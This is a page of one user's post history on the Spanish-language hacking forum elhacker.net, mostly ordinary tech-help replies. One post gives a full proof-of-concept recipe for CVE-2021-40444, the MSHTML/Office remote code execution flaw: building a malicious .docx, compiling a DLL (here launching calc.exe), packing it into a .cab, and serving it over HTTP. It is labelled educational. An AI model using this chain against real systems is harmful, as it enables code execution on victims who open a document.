elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Tema destacado: Top 20 herramientas Hacking más populares de 2020

Mostrar Mensajes
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 73
1  Sistemas Operativos / Windows / Re: Me sale esto en mi notebook? en: 26 Septiembre 2021, 15:12 pm
Enciendo el ordenador y me sale este mensaje que hago para que no me salga más o arreglar esto?
(...)
dato que no he dicho pues no lo cargo con su cargador original (porque lo perdí el suyo) , si no con otro cargador de otro portátil que es hp pero no carga

Que hago?

Comprate un cargador original de Dell y no te va a salir más...

B#
2  Seguridad Informática / Hacking / Re: Como puedo instalar un servicio vulnerable [metasploitable3] en: 15 Septiembre 2021, 03:09 am
Hola a todos, estoy practicando el ataque de puertos, y quería saber si existe algún puerto con vulnerabilidades para explotarlas (El cual este creado para eso, para explotarlo y practicar)

Metasploitable 3 si mal no tengo entendido es un Windows 7 / 2008 el cuál debería tener la vulnerabilidad de eternalblue si recuerdo haber leído alguna vez por internet...

Por otra parte te dejo Metasploitable 2 el cuál tiene es un Ubuntu viejo con al menos 3 puertos al que se le pueden explotar y hacer un RCE (vsftpd, smb y unreal irc).

B#
3  Media / Multimedia / Re: necesito programa para agregar efectos a videos en: 14 Septiembre 2021, 15:59 pm
los efectos que necesito son: Green Screen o Chroma key , Blur , Black and White , Color overlay, Noise , Fade In

Podrías probar con KDEnlive

B#
4  Seguridad Informática / Bugs y Exploits / PoC CVE-2021-40444 MSHTML y MS Office RCE en: 13 Septiembre 2021, 15:55 pm
Solo válido para motivos educativos

Fuente: https://github.com/lockedbyte/CVE-2021-40444

Generando el documento .docx:

Ir a maldoc/word/_rels/document.xml.rels y editar los textos http://<HOST> con el URL del archivo exploit.html

Luego se genera el documento .docx
Código
  1. cd maldoc/ ; zip -r maldoc.docx *

Generar el archivo dll

Código
  1. #include <windows.h>
  2.  
  3. void exec(void) {
  4. system("C:\\Windows\\System32\\calc.exe");
  5. return;
  6. }
  7.  
  8. BOOL WINAPI DllMain(
  9.    HINSTANCE hinstDLL,
  10.    DWORD fdwReason,
  11.    LPVOID lpReserved )
  12. {
  13.    switch( fdwReason )
  14.    {
  15.        case DLL_PROCESS_ATTACH:
  16.           exec();
  17.           break;
  18.  
  19.        case DLL_THREAD_ATTACH:
  20.            break;
  21.  
  22.        case DLL_THREAD_DETACH:
  23.            break;
  24.  
  25.        case DLL_PROCESS_DETACH:
  26.            break;
  27.    }
  28.    return TRUE;
  29. }

Compilar:
Código
  1. i686-w64-mingw32-gcc -shared calc.c -o calc.dll

Instalar la dependencia lcab
Código
  1. sudo apt-get install lcab

Código
  1. cp calc.dll championship.inf ; mkdir gen/ ; cd gen/ ; lcab '../championship.inf' out.cab

Copiar el archivo out.cab en el directorio www/, modificar exploit.html para apuntar a http://localhost/out.cab

Ejecutar el script: patch_cab.py

Finalmente crear el servidor:

Código
  1. cd www/ ; sudo python3 -m http.server 80

Parte final

Ejecutar maldoc.docx en una Máquina virtual.

B#
5  Media / Juegos y Consolas / Re: Skyrim no tiene voces de personajes ni música en Ubuntu. en: 4 Septiembre 2021, 22:30 pm
Sólo oigo los ruidos ambientales y mis propias pisadas.

Está todo funcionando perfectamente con Steam Play y Proton...un poco peor que en Windows pero a mi me sirve.
(...)
¿Alguien me ayuda?. Muchas gracias.

npc sound is missing, add WINEDLLOVERRIDES=”xaudio2_7=n,b” PULSE_LATENCY_MSEC=90 %command% to the launch options

B#
6  Programación / Programación C/C++ / Re: Ayuda con el uso de & y * en C en: 28 Agosto 2021, 05:28 am
Lo que no logro entender es por que en los scanf es necesario utilizar el operador & para su direccion en memoria. No es que al estar apuntando a un campo de la struct alumno ya es una dirección?

No, el puntero P contiene la dirección base de la memoria reservada por el sistema operativo para el proceso actual. Y para obtener la dirección hacia donde escribir en cada elemento necesitás el & de lo contrario solo obtendrías el valor del elemento...

Y por que en el caso del gets no necesito ponerlo? No lo entiendo.

Siempre que tengas un vector al llamar al "nombre de la variable en general" estás llamando a la dirección de memoria de la primera posición del elemento del vector, ambos códigos deberían ser igual al compilar:

Código
  1. gets((P+I)->nombre);
  2. gets(&((P+I)->nombre[0]));

B#
7  Foros Generales / Foro Libre / Re: Primera Potencia en: 25 Agosto 2021, 14:01 pm
mientras tanto China podrá tener mas dinero, pero eso no la hará la primera potencia mundial si no lo demuestra en una gran guerra como debe ser...
De seguro se va a desatar una guerra en el 2049 cuando China intente conquistar Taiwan...

tampoco tiene China la supremacía en el desarrollo de componentes semiconductores porque en eso le ganan sus vecinos coreanos y ni hablar de los japoneses...
Ya que lo mencioné arriba también te falto añadir a Taiwan, el cuál es el país más avanzado en fabricación de chips del mundo.

B#
8  Foros Generales / Foro Libre / Re: El waifai del vecino... en: 25 Agosto 2021, 01:18 am

Un momentooooo, ¿el Chema era mujer? :o
Eso explica el cabello largo de seguro...

B#
9  Foros Generales / Dudas Generales / Re: Existe material que trate el diseño de un sistema operativo simple? en: 23 Agosto 2021, 20:50 pm
Cuando te hagas tu propio minix no lo llames linux ¿OK?

Mejor que lo llame Freax... :silbar:

tengo ganas de hacer algún programa que simule ser un sistema operativo, algo que sea simple pero que vaya por ese lado . He visto también en algún libro un ejercicio para crear un "lenguaje máquina" propio y luego diseñar una especie de compilador, pero no trata muy a fondo el tema...
Saben de material que trate sobre esta clase de proyectos especificamente para obtener alguna idea ?

Aunque nunca llegué a utilizar el compilador pero si la máquina virtual en algunos proyectos, podrías probar Lua el cual tiene un compilador para compilar al bytecode de la máquina virtual que use Lua...
Por cierto el lenguaje padre con el que se compila Lua es C por lo que podrías probar scripts o incluso compilar el compilador y simular un prompt en C/C++ que ejecute y cargue los archivos compilados de Lua o sus scripts.

B#
10  Programación / Programación C/C++ / Re: Código con un error detectado en: 22 Agosto 2021, 10:13 am
Buenas noches foreros y moderadores. (...) El compilador me arroja error, solicitando un identifcador antes del último token de apertura

Tenés un punto y coma de más al final del prototipo de la función que implementa el resto, sacáselo.

int Resto(int a, int b, int c);
{
    int resto;

resto = a - (b * c);

return(resto);
}

B#
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 73
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines